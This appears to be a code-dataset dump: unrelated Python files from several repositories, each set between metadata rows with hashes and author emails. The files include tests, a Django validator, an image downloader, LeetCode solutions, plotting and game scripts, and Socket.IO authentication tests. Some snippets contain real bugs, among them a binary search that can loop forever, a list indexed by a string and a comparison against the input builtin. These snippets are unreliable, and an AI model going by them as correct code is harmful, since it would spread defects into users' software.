class EdgeLangInvalidTestCase(EdgeLangBaseTestCase):
    """ unknown directives (A1,B1,C1) must be rejected """
    @unittest.expectedFailure
    def runTest(self):
        """ implement runTest"""
        program = edgelang.to_ll("A1,B1,C1")
        edgell.to_bytes(program[0])
class EdgeLangDurationTestCase(EdgeLangBaseTestCase):
    """ negative durations (D-1) must be rejected """
    @unittest.expectedFailure
    def runTest(self):
        """ implement runTest"""
        program = edgelang.to_ll("M1,D-1")
        edgell.to_bytes(program[0])
# Allow running the suite directly: ./testll.py
if __name__ == '__main__':
    unittest.main()
| [
"patrickmmartin@gmail.com"
] | patrickmmartin@gmail.com |
4e2af1e710b0143771e5e7899d03b60112140c79 | c995aadb4d9e878f7315c7b180130f85c7760bd7 | /src/contract/user/getByIdUserContract.py | 0199dd6f4eb41ed91fb991fbde6dba20bd2dad75 | [] | no_license | machine-projects/SICON_API | 82366051f3dbe224f2b09fde5ebfd8c3a87cba2b | 00c941b44760c0a68f476abef424c19950233466 | refs/heads/master | 2023-03-30T00:02:06.029715 | 2021-03-27T20:59:59 | 2021-03-27T20:59:59 | 347,988,027 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 383 | py | from src.infra.model.resultModel import ResultErrorModel
class GetByIdUserContract(ResultErrorModel):
    """Validation contract for the "get user by id" endpoint."""

    def __init__(self):
        super().__init__()

    def validate(self, _id):
        """Validate the incoming id and return the contract's validity.

        Fixes the original, which called ``_id.isnumeric()`` even when
        ``_id`` was falsy: that raises AttributeError for ``None`` and
        reported both errors for an empty string.
        """
        if not _id:
            self.add_error('id', 'id é obrigatorio.')
        elif not _id.isnumeric():
            self.add_error('id', 'id precisa ser um inteiro.')
        return self.valid()
| [
"felipe_toffoli1@hotmail.com"
] | felipe_toffoli1@hotmail.com |
63c9a0b1b02b8e131d836166d8ff40992a215c05 | a18d516ca6db6c9e69788851167dc6bead70de1d | /P3-concurrency/common.py | c0ec89f43d7d3e43745ad45967bf7f5391fcdfd7 | [] | no_license | YGYtl/python3-web-PC | d7080a386e2629465e08815468223f5a707588f8 | 5d64f7fb5b68563f84aaf0afd399d8cb0d1bed4b | refs/heads/master | 2022-09-27T07:54:54.983494 | 2020-05-31T02:52:06 | 2020-05-31T02:52:06 | 268,081,141 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,104 | py | import os
import time
import requests
from logger import logger
basepath = os.path.abspath(os.path.dirname(__file__)) # root directory of this module's file
def setup_down_path():
    '''Create (if needed) and return the directory where downloads are saved; all images share one directory.'''
    down_path = os.path.join(basepath, 'downloads')
    if not os.path.isdir(down_path):
        os.mkdir(down_path)
        logger.info('Create download path {}'.format(down_path))
    return down_path
def get_links():
    '''Return the download URL for every image.'''
    with open(os.path.join(basepath, 'flags.txt')) as f: # image names are stored in this file, one per line
        return ['http://192.168.157.134/flags/' + flag.strip() for flag in f.readlines()]
        # flag.strip() removes leading/trailing whitespace; flag.strip('0') would strip zeros
def download_one(image): # takes one dict (rather than three positional args) so it plugs straight into concurrent.futures.ThreadPoolExecutor.map()
    '''Download a single image.

    :param image: dict with the save directory ('path'), the image's
        sequence number ('linkno') and its URL ('link')
    '''
    logger.info('Downloading No.{} [{}]'.format(image['linkno'], image['link']))
    t0 = time.time()
    resp = requests.get(image['link'])
    filename = os.path.split(image['link'])[1]
    with open(os.path.join(image['path'], filename), 'wb') as f:
        f.write(resp.content) # resp.content is bytes, while resp.text is str
    t1 = time.time()
    logger.info('Task No.{} [{}] runs {} seconds.'.format(image['linkno'], image['link'], t1 - t0))
def download_one_starmap(path, linkno, link):
    '''
    Download a single image (positional-argument variant, for starmap use).
    1. param path: directory the image is saved into
    2. param linkno: sequence number of the image
    3. param link: URL of the image
    '''
    logger.info('Downloading No.{} [{}]'.format(linkno, link))
    t0 = time.time()
    resp = requests.get(link)
    filename = os.path.split(link)[1]
    with open(os.path.join(path, filename), 'wb') as f:
        f.write(resp.content)
    t1 = time.time()
    logger.info('Task No.{} [{}] runs {} seconds'.format(linkno,link,t1-t0))
| [
"ygy.cs06@outlook.com"
] | ygy.cs06@outlook.com |
a7bdc7e68f69e1ee5f6344a4c53f9201e381210e | 43b4874111ad43cc66f9a5974f58d6897e980757 | /34. Find First and Last Position of Element in Sorted Array.py | 45964ea8c74b898a6b8e20c6629c2ccf1c249913 | [] | no_license | backcover7/Algorithm | 39aa0444676ee7354c32e0cc1e1c16fcabe93ec4 | 8b0cb32550b14d1a9dc63d156c001445a58c2d2b | refs/heads/master | 2020-08-14T06:43:34.857421 | 2019-12-23T23:49:58 | 2019-12-23T23:49:58 | 215,116,039 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,333 | py | class Solution(object):
    def searchRange_cheating(self, nums, target):
        """
        :type nums: List[int]
        :type target: int
        :rtype: List[int]
        """
        # Linear approach: find the first occurrence with list.index, then
        # walk right until the run of `target` values ends.
        if len(nums) == 0: return [-1, -1]
        if target in nums: index = first = nums.index(target)
        else: return [-1, -1]
        # Only occurrence is the last element: first == last.
        if first == len(nums)-1: return [len(nums)-1, len(nums)-1]
        while (first+1<=len(nums)):
            if first+1 == len(nums):
                last = first
                break
            if nums[first+1] == target:
                first += 1
            elif nums[first+1] != target:
                last = first
                break
        return [index, last]
def searchRange(self, nums, target):
if target not in nums:
return [-1, -1]
left, right = 0, len(nums)
while left < right:
middle = (left + right) // 2
if target < nums[middle]:
right = middle
elif target > nums[middle]:
left = middle
else:
break
i = middle
while i >= 0 and nums[i] == target:
i -= 1
j = middle
while j <= len(nums) -1 and nums[j] == target:
j += 1
return [i+1, j-1]
# Manual smoke test (Python 2 print statement); expected output: [3, 4]
S = Solution()
print S.searchRange([5,7,7,8,8,10],8)
"noreply@github.com"
] | backcover7.noreply@github.com |
7b6f7484cb3c1c0a99d4139fa6e0a1b4a53cbb31 | 6452ffce36d1d50dbb27657398af4314ba73c0aa | /python/sqlite-benchmark-graph.py | 90612bef91573d686282d438380c1415e3b71cf0 | [] | no_license | laysakura/sqlite3_benchmark | 1bde4f37be88e20d8a7a385ab897bfe571f7ce3b | f125db9466f9467b7fbd877285e8bd2669fe5346 | refs/heads/master | 2016-09-06T09:06:43.350515 | 2012-11-20T12:55:22 | 2012-11-20T12:55:22 | 6,775,963 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,324 | py | #!/usr/bin/env python
import smart_gnuplotter
# Shared gnuplot driver instance used by every helper below.
g = smart_gnuplotter.smart_gnuplotter()
import Config
import Util
def get_graph_file_name(var_graph_file_params):
    """Build the output-file name template, e.g. "a_%(a)s--b_%(b)s".

    Each key becomes a "key_%(key)s" segment (a gnuplot substitution slot),
    joined by "--"; an empty dict yields an empty string.
    """
    segments = ["%(key)s_%%(%(key)s)s" % {"key": key}
                for key in var_graph_file_params.keys()]
    return "--".join(segments)
def get_title_from_var_params(var_params):
    """Build a title template like "a='%(a)s' ; b='%(b)s'" from the keys."""
    parts = ["%(key)s='%%(%(key)s)s'" % {"key": key}
             for key in var_params.keys()]
    return " ; ".join(parts)
def _get_var_graph_file_param_names():
    """Ask the make subsystem which parameters vary per graph file."""
    out, _err = Util.sh_cmd_sync(
        "(cd %s/make ; make --quiet show_var_graph_file_params)" %
        (Config.basedir))
    return out.split()
def _get_var_plot_param_names():
    """Ask the make subsystem which parameters vary per plot."""
    out, _err = Util.sh_cmd_sync(
        "(cd %s/make ; make --quiet show_var_plot_params)" %
        (Config.basedir))
    return out.split()
def _get_param_keyvals(param_names):
    """Map each parameter name to its distinct values in the results table."""
    return {
        key: g.do_sql(
            Config.resultsDbPath,
            "select distinct " + key + " from " + Config.resultsDbTable + ";",
            single_col=1)
        for key in param_names
    }
def get_var_graph_file_params():
    """Distinct values for every per-graph-file parameter."""
    return _get_param_keyvals(_get_var_graph_file_param_names())
def get_var_plot_params():
    """Distinct values for every per-plot parameter."""
    return _get_param_keyvals(_get_var_plot_param_names())
def get_where_clause(var_graph_file_params, var_plot_params):
    """Build the WHERE template over every varying parameter.

    The result keeps the original's trailing space, e.g.
    "a='%(a)s' and b='%(b)s' "; empty inputs give "".
    """
    conds = ["%s='%%(%s)s'" % (p, p)
             for p in list(var_graph_file_params) + list(var_plot_params)]
    if not conds:
        return ""
    return " and ".join(conds) + " "
def get_temp_table_sql():
    # SQL executed once before the plotting query; currently only a
    # placeholder comment -- add `create temp table` statements as needed.
    return (
        """
        -- Write `create temp table tmp_T0 ...'
        """
        )
def plot(var_graph_file_params, var_plot_params):
    """Render one histogram (avg +/- stdev of real_time per SQL statement)
    for every combination of the per-graph-file parameters."""
    ## Temp table definition
    init = get_temp_table_sql()

    w = get_where_clause(var_graph_file_params, var_plot_params)
    # Mean and spread of wall-clock time, grouped by statement number.
    query = (
        "select 'SQL'||sql_no, avg(real_time), stdev(real_time)" +
        " from " + Config.resultsDbTable +
        " where " + w +
        " group by sql_no;"
    )
    vars_dict = var_graph_file_params.copy()
    vars_dict.update(var_plot_params)
    g.graphs(
        (Config.resultsDbPath, query, init),
        terminal=Config.graphTerminal,
        output="%s/resultsGraph/%s" % (
            Config.basedir,
            get_graph_file_name(var_graph_file_params)),
        graph_attr="""
set style fill solid 1.00 border 0
set style histogram errorbars gap 2 lw 1
set style data histogram
set xtics rotate by -45
set grid ytics
""",
        graph_title=get_title_from_var_params(var_graph_file_params),
        plot_title=get_title_from_var_params(var_plot_params),
        using="2:3",
        yrange="[0:]",
        xlabel=Config.graphXlabel,
        ylabel=Config.graphYlabel,
        vars_dict=vars_dict,
        graph_vars=var_graph_file_params.keys(),
    )
def main():
    """Fetch the varying parameters and render the elapsed-time graphs."""
    ## Get appropriate graph variables
    var_graph_file_params = get_var_graph_file_params()
    var_plot_params = get_var_plot_params()

    ## Elapsed time
    plot(var_graph_file_params, var_plot_params)
# Script entry point.
if __name__ == "__main__":
    main()
| [
"lay.sakura@gmail.com"
] | lay.sakura@gmail.com |
330d0f81dcb58d00bfd0329cfe9ee601c4e8999c | 867def0d5d7e14b8364c6d3cb281379a64255e0a | /venv/Scripts/pip3-script.py | 1c9fd9c5ee55604d3baf97ee0959f06455ffcebd | [] | no_license | abdo-fysal/cnn | a0d0a21db55b3b95ee8dfcdc5e013f7e43152f96 | 75d684883cd9942c87cbaf4eee01ebbdb5b78aa5 | refs/heads/master | 2021-01-25T10:06:12.303699 | 2018-02-28T20:46:39 | 2018-02-28T20:46:39 | 123,338,523 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 411 | py | #!C:\Users\abdo\PycharmProjects\untitled1\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==9.0.1','console_scripts','pip3'
# NOTE: setuptools-generated console-script wrapper; not hand-maintained.
__requires__ = 'pip==9.0.1'
import re
import sys

from pkg_resources import load_entry_point

if __name__ == '__main__':
    # Strip the '-script.py'/'.exe' suffix so pip sees its canonical name.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(
        load_entry_point('pip==9.0.1', 'console_scripts', 'pip3')()
    )
| [
"abdo.faysal@yahoo.com"
] | abdo.faysal@yahoo.com |
c4a8c3340dd04fd502ece451bc4af09e878efb4a | 397ff57da9aa5ca08e159b75d36efb3896d6155e | /old_models/utils/torch_input.py | f5e3aca2f149880cfdfff8086092e1ab528baaeb | [] | no_license | antorhasan/bank_line_prediction | a25656a57dd7c13139783f288766181f5e60186b | be4b8584de522b6f4485382307707f0bc36b2cbe | refs/heads/master | 2022-12-10T19:07:09.928835 | 2022-03-04T21:32:11 | 2022-03-04T21:32:11 | 192,115,348 | 0 | 1 | null | 2022-12-08T11:47:50 | 2019-06-15T19:13:57 | Python | UTF-8 | Python | false | false | 599 | py | import torch
from torch.utils import data
class Dataset(data.Dataset):
    """Torch dataset that lazily loads one tensor file per sample id."""

    def __init__(self, list_IDs, labels):
        """Store the sample ids and the id -> label mapping."""
        self.labels = labels
        self.list_IDs = list_IDs

    def __len__(self):
        """Total number of samples."""
        return len(self.list_IDs)

    def __getitem__(self, index):
        """Load sample *index*: the tensor from data/<id>.pt plus its label."""
        sample_id = self.list_IDs[index]
        features = torch.load('data/' + sample_id + '.pt')
        return features, self.labels[sample_id]
"kaziantorhasan@gmail.com"
] | kaziantorhasan@gmail.com |
a003bcb38318a40c71739f4d1552601723b08b17 | 11aaeaeb55d587a950456fd1480063e1aed1d9e5 | /.history/test_20190626132733.py | 79accd38ca746ea23e96e964bef94a8f31ed415e | [] | no_license | Gr4cchus/Learn-Python-3-The-Hard-Way | 8ce9e68f6a91ea33ea45fe64bfff82d65422c4a8 | f5fa34db16cdd6377faa7fcf45c70f94bb4aec0d | refs/heads/master | 2020-05-17T23:18:29.483160 | 2019-06-26T18:42:52 | 2019-06-26T18:42:52 | 184,023,439 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,126 | py | # # class Foo:
# # answer = 42
# # f1 = Foo()
# # f2 = Foo()
# # print(f1.answer)
# # print(f2.answer)
# # # both will print 42
# # f1.answer = 84
# # Foo.answer = 21
# # print(f1.answer) # 84
# # print(f2.answer) # 21
# class Foo:
# def __init__(self):
# self.answer = 42
# f1 = Foo()
# f2 = Foo()
# # f2.answer = 4000
# Foo.answer = 21
# # f1.answer = 2000
# print(f1.answer)
# print(f2.answer)
# # both will print 42 still
class Scenes(object):
    """Scene graph for a small text adventure (work-in-progress draft)."""

    # def __init__(self):
    #     # self.starting_room = starting_room
    #     # self.locations = {
    #     #     'room1': Room1(),
    #     #     'room2': Room2()
    #     # }

    # Names of reachable locations; each matches a method below.
    map_list = [
        'room1',
        'room2',
        'finish'
    ]

    def start(self):
        # Entry scene: greet the player and list the destinations.
        print("You are at the start")
        print("Where would you like to go")
        self.locations()

    def room1(self):
        print("You enter room 1")
        print("Where would you like to go")
        self.locations()

    def room2(self):
        print("You enter room 2")
        print("Where would you like to go")
        self.locations()

    def finish(self):
        # Terminal scene: ends the program.
        print("You have finished")
        exit(0)

    def locations(self):
        # Print every destination the player can type.
        print("def locations:", self.map_list)
        for i in self.map_list:
            print(i)

    # NOTE(review): class-level dispatch table of plain (unbound) functions;
    # 'finish' is missing, so dispatching through cmd would KeyError on it.
    cmd = {
        'room1': room1,
        'room2': room2,
    }

    def guessing_game(self):
        # Currently unused stub.
        print("Oh no a mini-game")
# class Map(Scenes):
# a = Scenes()
# map_dict = {
# 'room1': a.room1(),
# 'room2': a.room2(),
# }
# class Engine():
# def __init__(self, map):
# self.map = map
# def play(self):
# while True:
# # a = self.map.dict_locations
# print('yes')
# Simple REPL driver: type a location name from Scenes.map_list to move.
thescenes = Scenes()

thescenes.start()
while True:
    action = input("> ")
    if action in thescenes.map_list:
        print("success")
        # BUG FIX: the original did `thescenes.map_list[action](thescenes)`,
        # which indexes a *list* with a string and raises TypeError.
        # Dispatch to the bound method of the same name instead; unlike
        # Scenes.cmd, this also covers 'finish'.
        getattr(thescenes, action)()
"ahivent@gmail.com"
] | ahivent@gmail.com |
e481fb804a420ea35504640c9219c0b0f7da94c0 | 2d8d8742bc510a1cf67f0e208568d63bcbf49d4f | /Prediction/bcd.py | 5cb39b996493324aac80a4e1091533c3f9e0321c | [] | no_license | abhikbhattacharjee/BE_Project | bb834a32229ac2f914921ec555084c689a9a90b8 | f6cf474266f74f5e362c3216c270ce35eb669d3c | refs/heads/master | 2023-08-21T21:36:26.798272 | 2021-09-26T10:47:02 | 2021-09-26T10:47:02 | 197,564,771 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 365 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 7 10:16:09 2019
@author: chinmay
"""
import pandas as pd
# Read the named sheet from the PePr peak-calling workbook.
p_c=pd.read_excel("Peakcalling_1e-4__PePr_peaks_homer.xlsx", 'Peakcalling_1e-4__PePr_peaks_ho')
cols = [1,2,3]  # keep only these column positions (0-based)
df = p_c[p_c.columns[cols]]
#df=df.sample(n=258)
# Write a headerless, index-free TSV consumed by the prediction step.
df.to_csv(path_or_buf="predict.tsv",sep='\t',index=False,header=False)
| [
"noreply@github.com"
] | abhikbhattacharjee.noreply@github.com |
2e7eeb1bbc26d482b08aabe4f0ca5824c1d7a472 | 02ffd6dfd5ef11027f9cd3b45f5ba48d5144747c | /7 Variable.py | f02bbf47fafe9dce47c8864c2a49d70a070ecb56 | [] | no_license | Zoran1024/tensorflow1.x- | 686f87962ab5c9a42ccc8d0898fc6e78399a6f52 | 9ce3808d0da7866967a6679f2564971ea1b8fb4f | refs/heads/master | 2022-12-06T16:44:21.881179 | 2020-08-12T09:16:47 | 2020-08-12T09:16:47 | 286,948,062 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 397 | py | import tensorflow as tf
# TF1 graph-mode counter: `state` starts at 0, `update` assigns state + 1.
state = tf.Variable(0,name='counter')
#print(state.name)
one = tf.constant(1)
new_value = tf.add(state,one)
update = tf.assign(state,new_value) # load new_value into state
init = tf.initialize_all_variables() # must have if define variable
# NOTE(review): initialize_all_variables is the deprecated TF1 spelling of
# global_variables_initializer.
with tf.Session() as sess:
    sess.run(init)
    for i in range(3):
        sess.run(update)
        print(sess.run(state))  # prints 1, 2, 3
"528778310@qq.com"
] | 528778310@qq.com |
17f4605acddde5733e7845a54b2e7a72f439d2b9 | 58bca29946133281eca5bf1f255b10d497ae2f13 | /ros_ws/devel/lib/python3/dist-packages/moveit_msgs/msg/_MotionPlanDetailedResponse.py | 03fb12b54fc034126496a61dc263bcfe988e87c9 | [] | no_license | AlexanderVieira/robotics | d3656f72f0f375d0229bef923d15d6ffe3d8750f | 0c54b200ccbc702f807212cfe5c40b6ca865b16f | refs/heads/main | 2023-03-31T05:15:19.378479 | 2021-04-09T01:53:26 | 2021-04-09T01:53:26 | 355,740,229 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 112 | py | /home/ros_ws/devel/.private/moveit_msgs/lib/python3/dist-packages/moveit_msgs/msg/_MotionPlanDetailedResponse.py | [
"alexander.silva@al.infnet.edu.br"
] | alexander.silva@al.infnet.edu.br |
689746fc5657a327e7a2e445e3ab2ba17677361b | abdc6f531223fd0327bf2f5c5ea6168de9f77178 | /src/Main.py | 56c749b5a44e1e325fe98a7ef032eba61a4fbcfa | [] | no_license | camouflage/Database | 84ea4f38d5e14bed3c589b63e575be7c7d056f6b | 1541e5c0d1cf5d33545c1575e848fc3609012eab | refs/heads/master | 2020-12-24T16:59:10.180889 | 2015-06-24T07:37:17 | 2015-06-24T07:37:17 | 36,067,888 | 4 | 2 | null | 2015-06-24T03:51:13 | 2015-05-22T11:04:16 | Python | UTF-8 | Python | false | false | 733 | py | #coding=utf-8
import MySQLdb
import SharedVar
from Authentication import *
from AdminOperation import *
from EmpOperation import *
def main():
    """
    Entry point: print the welcome banner, authenticate the user, dispatch
    to the admin or employee menu by role, then commit shared state.
    (Python 2 module — note the print statements.)
    """
    print "=========================================="
    print "=          欢迎使用 HELEN 酒店管理系统       "
    print "=                                        "
    print "=                     made by the authors "
    print "=========================================="
    # Presumably 0 = no access, 1 = administrator, 2 = employee —
    # confirm against the Authentication module.
    authentication = Authentication()
    SharedVar.init()
    if authentication == 0:
        pass
    elif authentication == 1:
        AdminOp()
    elif authentication == 2:
        EmpOp()
    # Persist whatever SharedVar buffered during the session.
    SharedVar.commit()
    # Debug dump of the shared identifiers.
    print SharedVar.UserId, SharedVar.RoomId, SharedVar.GId, SharedVar.ResId
if __name__ == "__main__":
    main()
"363419254@qq.com"
] | 363419254@qq.com |
9768d6a3edff696c9dc4b9790ff908e5722ada1f | b93bda18f43bdf0cbd549ba1e74d7ffd59a4d3fe | /monsite/urls.py | 45e7dfc7b103471c2b27ff8eb462048d3a4ad302 | [] | no_license | marieaimee40/mon-nouveau-blog | e2efa0d6e4be31492c89ddbc5384cc073f72d977 | f4e6fdb7b5b98fc68d9ddc554b886fadcb8bbc2e | refs/heads/master | 2022-04-21T14:20:34.307569 | 2020-04-21T00:07:25 | 2020-04-21T00:07:25 | 257,427,079 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 793 | py | """monsite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
urlpatterns = [
    path('admin/', admin.site.urls),  # Django admin site
    path('', include('blog.urls')),   # the blog app serves the site root
]
| [
"konemarieaimee@gmail.com"
] | konemarieaimee@gmail.com |
1ec17915e3f19972828f43dc0cadcc6cbec8c414 | cebe96ac3edbc4d47456a72c8af360170cc7d286 | /practice/Test_hw.py | d07721b7f68805aa5c2701b685eab68964e0fe2e | [] | no_license | fullerharrison/afs505_u1 | 5134b9454275d2fd7feeb15087f8d13e326a9286 | fb1c9f5cc3e0d5609ccab98c1f8f7ab6dbc00f50 | refs/heads/master | 2020-12-13T10:42:36.297124 | 2020-05-13T23:55:45 | 2020-05-13T23:55:45 | 234,392,664 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 201 | py | statement = input()
if statement == "t":
    print("Yes")
    # NOTE(review): `input` here is the builtin function object, not the
    # user's text, so `input != "x"` is always True and "Rubbish" is always
    # printed. Probably meant `statement != "x"` or a fresh input() call —
    # confirm the intent before fixing.
    if input != "x":
        print("Rubbish")
    else:
        pass
elif statement == "N":
    print("No")
else:
    print("What?")
| [
"harrison.fuller@wsu.edu"
] | harrison.fuller@wsu.edu |
05b6ac28c06c1faa07725f1786566eb5c14c622c | add4e82987a5e25cca6f2a33b6373bc7e13c9164 | /unittest_md.py | c824d22ec504b6852d1acc6c99ea77c03a2cdf25 | [] | no_license | rogerOncu/hands-on-3 | 35d214d55d1045cd07a8a94d5defe6cc083f4a2f | ebecd8954403197486b285c24d6e06b47bdd94df | refs/heads/main | 2022-12-27T02:54:46.594870 | 2020-10-05T13:48:20 | 2020-10-05T13:48:20 | 301,413,145 | 0 | 0 | null | 2020-10-05T13:48:21 | 2020-10-05T13:11:50 | Python | UTF-8 | Python | false | false | 796 | py | import sys, unittest
from md import calcenergy
from ase.lattice.cubic import FaceCenteredCubic
from ase.md.velocitydistribution import MaxwellBoltzmannDistribution
from ase.md.verlet import VelocityVerlet
from ase import units
from asap3 import EMT
class MdTests(unittest.TestCase):
    """Unit tests for the md.calcenergy helper."""

    # Fix: the first parameter was named `a` instead of the conventional
    # `self`; unittest passes the instance positionally, so renaming is safe.
    def test_calcenergy(self):
        """Build a small Cu FCC lattice with an EMT calculator and check
        that calcenergy runs on it without raising."""
        size = 5
        atoms = FaceCenteredCubic(directions=[[1, 0, 0], [0, 1, 0], [0, 0, 1]],
                                  symbol="Cu",
                                  size=(size, size, size),
                                  pbc=True)
        atoms.calc = EMT()
        calcenergy(atoms)
if __name__ == '__main__':
    # Run the suite manually (instead of unittest.main) so the process
    # exit code reflects success (0) or failure (1).
    tests = [unittest.TestLoader().loadTestsFromTestCase(MdTests)]
    testsuite = unittest.TestSuite(tests)
    result = unittest.TextTestRunner(verbosity=0).run(testsuite)
    sys.exit(not result.wasSuccessful())
| [
""
] | |
cce07889dbbe1d3b324bd258d250530dddba9257 | 26fa881f2bc253cf4f44f48de534164052fd9509 | /server/tests/unit/test_sockets.py | 766f302984601bcc045161854b1134fb5ab4fb74 | [] | no_license | mmfrenkel/KERMit | 95d14e3cda5f423a0d5d7d9448c4d0d012e80866 | 54faa073a46099983a8b14ef03111d6a19fe0085 | refs/heads/main | 2023-01-29T16:31:03.332301 | 2020-12-10T22:29:37 | 2020-12-10T22:29:37 | 301,879,509 | 0 | 3 | null | 2020-12-08T18:11:04 | 2020-10-06T23:32:59 | Python | UTF-8 | Python | false | false | 12,665 | py | """
Unit tests for web socket functionality.
"""
import pytest
from backend import app, socketio
from backend.models.user import User
from backend.google_auth import GoogleAuth
from tests.unit.mocks import verification_token, mock_find_by_g_id,\
mock_no_puzzles_for_player, mock_single_puzzles_for_player, mock_get_puzzle
@pytest.fixture
def flask_client():
    """A Flask test client, rebuilt for each test."""
    return app.test_client()
def test_socketio_cannot_connect_without_credentials(flask_client):
    """
    Test that it is not possible to connect without credentials.
    """
    # connect to Socket.IO without being logged in (no auth query string)
    client = socketio.test_client(app, flask_test_client=flask_client)
    assert not client.is_connected()
def test_socketio_cannot_connect_with_invalid_credentials(monkeypatch, flask_client):
    """
    Test that it is not possible to establish a socket connection without a
    valid credential.
    """
    # connect to Socket.IO with a token that fails Google validation
    def mock_verify_token(*args, **kwargs):
        """Mock a failed verification of the token."""
        return {"error": "some error", "error_description": 'A bad error occurred'}
    monkeypatch.setattr(GoogleAuth, "validate_token", mock_verify_token)
    client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
    assert not client.is_connected()
def test_socketio_can_connect_with_valid_credentials(flask_client, verification_token):
    """
    Test that connecting succeeds when a valid auth token is supplied.
    (The verification_token fixture makes token validation pass.)
    """
    # connect to Socket.IO while "logged in"; no events should be queued yet
    client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
    assert client.is_connected()
    assert client.get_received() == []
def test_socketio_join_missing_token(flask_client, verification_token):
    """
    Test an attempt to join a room with the token missing; the join is ignored.
    """
    client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
    client.emit('join', {'puzzle_id': 1})
    assert client.get_received() == []
def test_socketio_join_missing_puzzle(flask_client, verification_token):
    """
    Test an attempt to join a room with the room id (i.e., puzzle id) missing.
    """
    client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
    client.emit('join', {'token': 'X'})
    assert client.get_received() == []
def test_socketio_join_bad_token(monkeypatch, flask_client, verification_token):
    """
    Test an attempt to join a room using a token that fails validation.
    """
    client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
    # make token validation fail only for the join, after a valid connect
    monkeypatch.setattr(GoogleAuth, "validate_token",
                        lambda x, y: {"error": "some error",
                                      "error_description": 'A bad error occurred'})
    client.emit('join', {'token': 'X', 'puzzle_id': 1})
    assert client.get_received() == []
def test_socketio_join_user_doesnt_exist(monkeypatch, flask_client, verification_token):
    """
    Test that if an attempt is made to join a room by an unregistered user,
    the attempt fails.
    """
    monkeypatch.setattr(User, 'find_by_g_id', lambda x: None)
    client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
    client.emit('join', {'token': 'X', 'puzzle_id': 1})
    assert client.get_received() == []
def test_socketio_join_puzzle_not_associated(flask_client, verification_token, mock_find_by_g_id,
                                             mock_no_puzzles_for_player):
    """
    Test an attempt to join a room when the puzzle is not associated with the
    player yet; the attempt should fail.
    """
    client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
    client.emit('join', {'token': 'X', 'puzzle_id': 1})
    assert client.get_received() == []
def test_socketio_join_puzzle(flask_client, verification_token, mock_find_by_g_id,
                              mock_single_puzzles_for_player):
    """
    Test a successful join: valid token plus an associated puzzle produces a
    player_joined broadcast for the room.
    """
    client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
    client.emit('join', {'token': 'X', 'puzzle_id': 1})
    recvd = client.get_received()
    assert recvd == [
        {'name': 'player_joined', 'args': [{'msg': 'Player joined room 1'}], 'namespace': '/'}
    ]
def test_socketio_disconnect(flask_client, verification_token):
    """
    Test that disconnecting the websocket succeeds.
    """
    client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
    client.disconnect()
    assert not client.is_connected()
def test_socketio_handle_move_missing_puzzle_id(flask_client, verification_token):
    """
    Test a move event that omits the puzzle_id; nothing should be re-emitted.
    """
    client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
    client.emit('move', {'x_coordinate': 1, 'y_coordinate': 5})
    assert client.get_received() == []
def test_socketio_handle_move_not_in_room(flask_client, verification_token, mock_get_puzzle):
    """
    Test re-emit move alert to members of a room; current socket is not part of
    the room, so it receives nothing.
    """
    client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
    client.emit('move', {'puzzle_id': 1, 'x_coordinate': 1, 'y_coordinate': 5})
    assert client.get_received() == []
def test_socketio_handle_move_in_room(flask_client, verification_token, mock_find_by_g_id,
                                      mock_single_puzzles_for_player, mock_get_puzzle):
    """
    Test re-emit move alert to members of a room; current socket is part of
    the room, so it receives the puzzle_update broadcast (mocked puzzle state).
    """
    client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
    client.emit('join', {'token': 'X', 'puzzle_id': 1})
    client.emit('move', {'puzzle_id': 1, 'x_coordinate': 1, 'y_coordinate': 5})
    recvd = client.get_received()
    # Expected payload matches the puzzle returned by mock_get_puzzle.
    assert recvd == [
        {'name': 'player_joined', 'args': [{'msg': 'Player joined room 1'}], 'namespace': '/'},
        {'name': 'puzzle_update', 'args': [
            {
                'puzzle_id': None,
                'completed': False,
                'difficulty': 0.5,
                'point_value': 90,
                'pieces': [
                    {'x_coordinate': 0, 'y_coordinate': 1, 'static_piece': False, 'value': None},
                    {'x_coordinate': 1, 'y_coordinate': 1, 'static_piece': True, 'value': 3}
                ]
            }
        ], 'namespace': '/'}]
def test_socketio_handle_message(flask_client, verification_token, mock_find_by_g_id,
                                 mock_single_puzzles_for_player):
    """
    Test handling a chat message in a room that the current websocket is in;
    the message is re-broadcast as message_update.
    """
    client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
    client.emit('join', {'token': 'X', 'puzzle_id': 1})
    client.emit('message', {
        'puzzle_id': 1, 'message': 'This is a message', 'email': 'exampleemail.com'
    })
